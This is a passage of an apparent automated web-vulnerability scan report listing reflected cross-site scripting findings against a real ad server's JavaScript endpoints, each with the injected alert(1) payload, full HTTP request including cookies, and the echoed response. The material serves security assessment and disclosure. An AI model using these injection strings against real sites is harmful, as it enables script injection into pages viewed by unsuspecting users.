Set-Cookie: mojo3=16186:1844/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:13:49 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 246
Date: Mon, 09 May 2011 16:18:03 GMT

document.write('<a target="_blank" href="http://altfarm.mediaplex.com/ad/ck/16186-115667-1844-30?mpt=[CACHEBUSTER]f07f3'-alert(1)-'3f3ce45e8c5&mpvc="><img ismap border=0 src="http://img-cdn.mediaplex.
...[SNIP]...

2.38. http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-1844-30

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82bd0'%3balert(1)//e99f9ac1dcf was submitted in the mpvc parameter. This input was echoed as 82bd0';alert(1)//e99f9ac1dcf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-1844-30?mpt=[CACHEBUSTER]&mpvc=82bd0'%3balert(1)//e99f9ac1dcf HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://addelivery.thestreet.com/afr.php?zoneid=15&ActiveProducts=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16186:1844/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:25:23 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 240
Date: Mon, 09 May 2011 16:18:04 GMT

document.write('<a target="_blank" href="82bd0';alert(1)//e99f9ac1dcfhttp://altfarm.mediaplex.com/ad/ck/16186-115667-1844-30?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com/0/
...[SNIP]...

2.39. http://altfarm.mediaplex.com/ad/js/16186-115667-1844-30 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-1844-30

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe8f0'%3balert(1)//36bf2b8f061 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe8f0';alert(1)//36bf2b8f061 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-1844-30?mpt=[CACHEBUSTER]&mpvc=&fe8f0'%3balert(1)//36bf2b8f061=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://addelivery.thestreet.com/afr.php?zoneid=15&ActiveProducts=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16186:1844/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:24:19 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 243
Date: Mon, 09 May 2011 16:18:20 GMT

document.write('<a target="_blank" href="&fe8f0';alert(1)//36bf2b8f061=1http://altfarm.mediaplex.com/ad/ck/16186-115667-1844-30?mpt=[CACHEBUSTER]"><img ismap border=0 src="http://img-cdn.mediaplex.com
...[SNIP]...

2.40. http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-22724-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1592'-alert(1)-'04538278fff was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-22724-5?mpt=4945974f1592'-alert(1)-'04538278fff&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/t%3B232843644%3B0-0%3B1%3B58770842%3B21-88/31%3B39446836/39464623/1%3B%3B%7Eaopt%3D3/1/22/0%3B%7Esscs%3D%3f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.investingchannel.com/bw_600x55.html?s=americanbankingnews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:02:27 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 360
Date: Mon, 09 May 2011 16:19:09 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/3/0/*/t;232843644;0-0;1;58770842;21-88/31;39446836/39464623/1;;~aopt=3/1/22/0;~sscs=?http://altfarm.mediaplex.com/ad/ck/16186-115667-22724-5?mpt=4945974f1592'-alert(1)-'04538278fff">
...[SNIP]...

2.41. http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-22724-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d35cc'%3balert(1)//12203e1a7f was submitted in the mpvc parameter. This input was echoed as d35cc';alert(1)//12203e1a7f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-22724-5?mpt=4945974&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/t%3B232843644%3B0-0%3B1%3B58770842%3B21-88/31%3B39446836/39464623/1%3B%3B%7Eaopt%3D3/1/22/0%3B%7Esscs%3D%3fd35cc'%3balert(1)//12203e1a7f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.investingchannel.com/bw_600x55.html?s=americanbankingnews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:28:00 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 359
Date: Mon, 09 May 2011 16:19:11 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/3/0/*/t;232843644;0-0;1;58770842;21-88/31;39446836/39464623/1;;~aopt=3/1/22/0;~sscs=?d35cc';alert(1)//12203e1a7fhttp://altfarm.mediaplex.com/ad/ck/16186-115667-22724-5?mpt=4945974">
...[SNIP]...

2.42. http://altfarm.mediaplex.com/ad/js/16186-115667-22724-5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/16186-115667-22724-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa07e'%3balert(1)//258c1e53e56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as aa07e';alert(1)//258c1e53e56 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/16186-115667-22724-5?mpt=4945974&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b02/3/0/%2a/t%3B232843644%3B0-0%3B1%3B58770842%3B21-88/31%3B39446836/39464623/1%3B%3B%7Eaopt%3D3/1/22/0%3B%7Esscs%3D%3f&aa07e'%3balert(1)//258c1e53e56=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://cdn.investingchannel.com/bw_600x55.html?s=americanbankingnews
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:27:17 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 363
Date: Mon, 09 May 2011 16:19:13 GMT

document.write('<a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3b02/3/0/*/t;232843644;0-0;1;58770842;21-88/31;39446836/39464623/1;;~aopt=3/1/22/0;~sscs=?&aa07e';alert(1)//258c1e53e56=1http://altfarm.mediaplex.com/ad/ck/16186-115667-22724-5?mpt=4945974">
...[SNIP]...

2.43. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-4

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e3e3'-alert(1)-'4c9a5dd862a was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17113-117439-25710-4?mpt=0.71937336283735936e3e3'-alert(1)-'4c9a5dd862a&mpvc=http://xads.zedo.com/ads2/c%3Fa=907483%3Bn=1452%3Bx=5632%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:09:14 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 401
Date: Mon, 09 May 2011 16:19:50 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=907483;n=1452;x=5632;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=http://altfarm.mediaplex.com/ad/ck/17113-117439-25710-4?mpt=0.71937336283735936e3e3'-alert(1)-'4c9a5dd862a">
...[SNIP]...

2.44. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c41a6'%3balert(1)//13d72982f9f was submitted in the mpvc parameter. This input was echoed as c41a6';alert(1)//13d72982f9f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17113-117439-25710-4?mpt=0.7193733628373593&mpvc=http://xads.zedo.com/ads2/c%3Fa=907483%3Bn=1452%3Bx=5632%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=c41a6'%3balert(1)//13d72982f9f HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:28:00 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 406
Date: Mon, 09 May 2011 16:19:52 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=907483;n=1452;x=5632;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=c41a6';alert(1)//13d72982f9fhttp://altfarm.mediaplex.com/ad/ck/17113-117439-25710-4?mpt=0.7193733628373593">
...[SNIP]...

2.45. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-4 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97f56'%3balert(1)//6574d9591f7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97f56';alert(1)//6574d9591f7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17113-117439-25710-4?mpt=0.7193733628373593&mpvc=http://xads.zedo.com/ads2/c%3Fa=907483%3Bn=1452%3Bx=5632%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=0%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=&97f56'%3balert(1)//6574d9591f7=1 HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/commentary/content/stocks+on+the+move+citigroup+inc+and+nvidia+corporation/trading_floor_blog.aspx?single=true&blogid=106213
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=16186:22724/17263:25710/17113:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/16186:22724/17263:25710/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:14:26 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 409
Date: Mon, 09 May 2011 16:19:55 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=907483;n=1452;x=5632;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=0;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=&97f56';alert(1)//6574d9591f7=1http://altfarm.mediaplex.com/ad/ck/17113-117439-25710-4?mpt=0.7193733628373593">
...[SNIP]...

2.46. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [mpt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-5

Issue detail

The value of the mpt request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16ec2'-alert(1)-'5e948ed25dc was submitted in the mpt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17113-117439-25710-5?mpt=16ec2'-alert(1)-'5e948ed25dc&mpvc=http://xads.zedo.com/ads2/c%3Fa=924366%3Bn=1452%3Bx=7936%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk= HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/17263:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 5:02:07 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 389
Date: Mon, 09 May 2011 16:21:23 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=924366;n=1452;x=7936;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=1;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=http://altfarm.mediaplex.com/ad/ck/17113-117439-25710-5?mpt=16ec2'-alert(1)-'5e948ed25dc">
...[SNIP]...

2.47. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-5

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59f59'%3balert(1)//5851236782d was submitted in the mpvc parameter. This input was echoed as 59f59';alert(1)//5851236782d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /ad/js/17113-117439-25710-5?mpt=0.030651481123641133&mpvc=http://xads.zedo.com/ads2/c%3Fa=924366%3Bn=1452%3Bx=7936%3Bc=1452000000,1452000000%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=1%3Bg=172%3Bm=34%3Bw=51%3Bi=0%3Bu=5ajh4goBADQAAFjiiCYAAABN~042311%3Bk=59f59'%3balert(1)//5851236782d HTTP/1.1
Host: altfarm.mediaplex.com
Proxy-Connection: keep-alive
Referer: http://www.schaeffersresearch.com/marketcenters/optionscenter/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=822523287793; __utmz=183366586.1303926238.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.719740200.1303926238.1303926238.1303926238.1; mojo2=17912:1281/16228:26209; mojo3=17263:25710/17113:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-store
Pragma: no-cache
Expires: 0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV"
Set-Cookie: mojo3=17113:25710/17263:25710/16186:22724/15368:22624/16228:16454/10105:1629/13198:5934/14302:16279/4608:12284/13001:12284/17975:12284/13966:19269/6726:1178/12309:27909/5712:3840/15902:34879/17404:9432/1551:17349/3484:15222/15017:28408; expires=Thu, 9-May-2013 4:24:19 GMT; path=/; domain=.mediaplex.com;
Content-Type: text/html
Content-Length: 395
Date: Mon, 09 May 2011 16:21:28 GMT

document.write('<a target="_blank" href="http://xads.zedo.com/ads2/c?a=924366;n=1452;x=7936;c=1452000000,1452000000;g=172;i=0;1=8;2=1;s=1;g=172;m=34;w=51;i=0;u=5ajh4goBADQAAFjiiCYAAABN~042311;k=59f59';alert(1)//5851236782dhttp://altfarm.mediaplex.com/ad/ck/17113-117439-25710-5?mpt=0.030651481123641133">
...[SNIP]...

2.48. http://altfarm.mediaplex.com/ad/js/17113-117439-25710-5 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://altfarm.mediaplex.com
Path:	/ad/js/17113-117439-25710-5

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d43c7'%3balert(1)//8d64271629e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d43c7';alert(1)//8d64271629e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

